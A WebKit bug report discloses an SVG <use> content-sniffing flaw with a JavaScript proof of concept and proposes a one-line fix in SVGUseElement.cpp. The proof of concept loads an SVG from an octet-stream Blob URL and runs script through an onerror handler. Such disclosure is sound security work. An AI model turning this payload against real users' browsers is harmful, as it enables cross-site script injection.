PoC: ``` const text = `<svg id="x" xmlns="http://www.w3.org/2000/svg"><image href="xyz" onerror="alert(origin)" /></svg>`; const blob = new Blob([text], {type: 'application/octet-stream'}); // <- not "image/svg+xml" const url = URL.createObjectURL(blob); let attackerControlledString = url + "#x"; const svg=document.createElementNS("http://www.w3.org/2000/svg", "svg"); const use=document.createElementNS("http://www.w3.org/2000/svg", "use"); use.setAttribute('href', attackerControlledString); svg.appendChild(use); document.body.appendChild(svg); ``` The above code only loads external SVG from a Blob URL in Webkit. Both Blink and Gecko ignores it due to content type mismatch. Potential fix is to add the following code after https://github.com/WebKit/WebKit/blob/5c3443a0ab7a7fdeaeeb20c104da59b55de0e265/Source/WebCore/svg/SVGUseElement.cpp#L614. ``` options.sniffContent = ContentSniffingPolicy::DoNotSniffContent; ```
<rdar://problem/103893082>